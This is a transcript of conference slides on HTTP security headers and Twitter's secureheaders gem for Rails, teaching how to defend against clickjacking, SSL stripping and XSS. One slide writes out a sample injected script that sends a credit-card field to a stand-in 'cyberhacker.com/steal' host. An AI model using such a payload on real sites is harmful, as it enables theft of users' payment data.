Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security headers

Security headers

Goes over headers like X-Frame-OPTIONS, Content Security Policy, HSTS, and more as well as a library that makes applying them to rails apps very simple

Avatar for Neil Matatall

Neil Matatall

March 16, 2013
Tweet

More Decks by Neil Matatall

Other Decks in Programming

Transcript

  1. @ocrails | @ndm @ocrails January 30, 2013 Not your typical

    Rails security talk Header use @ Twitter B
  2. @ocrails | @ndm OK, but what are browser headers Authorization:

    Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ== Accept: text/plain Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
  3. @ocrails | @ndm Do you use these? Content security policy

    X-Frame-Options HTTP Strict Transport Security X-Xss-Protection X-Content-Type-Options
  4. @ocrails | @ndm X-ContentType-Options Fixes mime sniffing attacks Only applies

    to IE, because only IE would do something like this X-Content-Type-Options = ‘nosniff’ zzzzZZZZZZzzzzz
  5. @ocrails | @ndm X-Xss-Protection Use the browser’s built in XSS

    Auditor X-Xss-Protection: [0-1](; mode=block)? X-Xss-Protection: 1; mode=block (SCREENSHOT OF BLOCKED SCRIPT) zzzzZZZ... huh? zzzzzzzz
  6. @ocrails | @ndm X-Frame-Options Protects you from most classes of

    Clickjacking X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN X-Frame-Options: ALLOW FROM example.com zzz... oh hey thats cool. Don’t frame my stuff.
  7. @ocrails | @ndm Firesheep/SSL Strip Given I don’t haven’t received

    an HSTS header And I have a session When I visit http://example.com Then I am pwned
  8. @ocrails | @ndm Other ssl fails Posting passwords over HTTP

    Loading mixed content Using protocol relative URLS
  9. @ocrails | @ndm How hard is it to use? Base

    Case Strict-transport-security: max-age=10000000 Do all of your subdomains support SSL? Strict-transport-security: max-age=10000000; includeSubdomains (SSL FOR DUMMIES PICTURE)
  10. @ocrails | @ndm Content secur-a-wat? Content security policy is reshaping

    the security model It is a complicated spec with great differences across browsers It is not widely adopted However, It completely eliminates reflected and stored XSS It ensures that you never load mixed content It can protect users with infected browsers It allows you to accept arbitrary html code from users
  11. @ocrails | @ndm Wat? Sounds cool. x-webkit-csp: script-src style-src img-src

    default-src frame-src connect-src font-src media-src object-src report-uri
  12. @ocrails | @ndm Get rid of XSS, eh? A script-src

    directive that doesn’t contain ‘unsafe-inline’ almost eliminates most forms of cross site scripting. I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT
  13. @owaspoc Jan 2013 @ndm | @presidentbeef But I have to...

    OK, then I’ll inject: <script> var image = new Image(); image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val(); </script> FALSE! img-src violation, no XHR allowed
  14. @ocrails | @ndm How to apply? Secure headers! Open sourced

    earlier this month https://github.com/twitter/secureheaders
  15. @ocrails | @ndm How does it work? It sets a

    before_filter that applies each header Values are based on options passed to filter, or in an initializer Easily overridden Secure by default!!!
  16. @ocrails | @ndm What about that security policy thingy There

    are > 6 differences between these two header values
  17. @ocrails | @ndm Other features Set separate policies for http/https

    Autofill chrome-extension: (becoming part of spec) Auto fill missing directives with default value (becoming part of the spec)
  18. @ocrails | @ndm What does the report look like? {

    "csp-report"=> { "document-uri"=>"http://localhost:3000/home", "referrer"=>"", "blocked-uri"=>"ws://localhost:35729/livereload", "violated-directive"=>"xhr-src ws://localhost.twitter.com:*" } }
  19. @ocrails | @ndm Quiz: what does this report indicate? {

    "csp-report"=> { "document-uri"=>"http://example.com/welcome", "referrer"=>"", "blocked-uri"=>"self", "violated-directive"=>"inline script base restriction", "source-file"=>"http://example.com/welcome", "script-sample"=>"alert(1)", "line-number"=>81 } }
  20. @ocrails | @ndm Header gem to the rescue It forwards

    CSP reports for Firefox It makes setting an enforce and report only mode easy for experimentation
  21. @owaspoc Jan 2013 @ndm | @presidentbeef CSP Brakeman ThreatDeck Phantom

    Gang Roshambo Email developer s Email security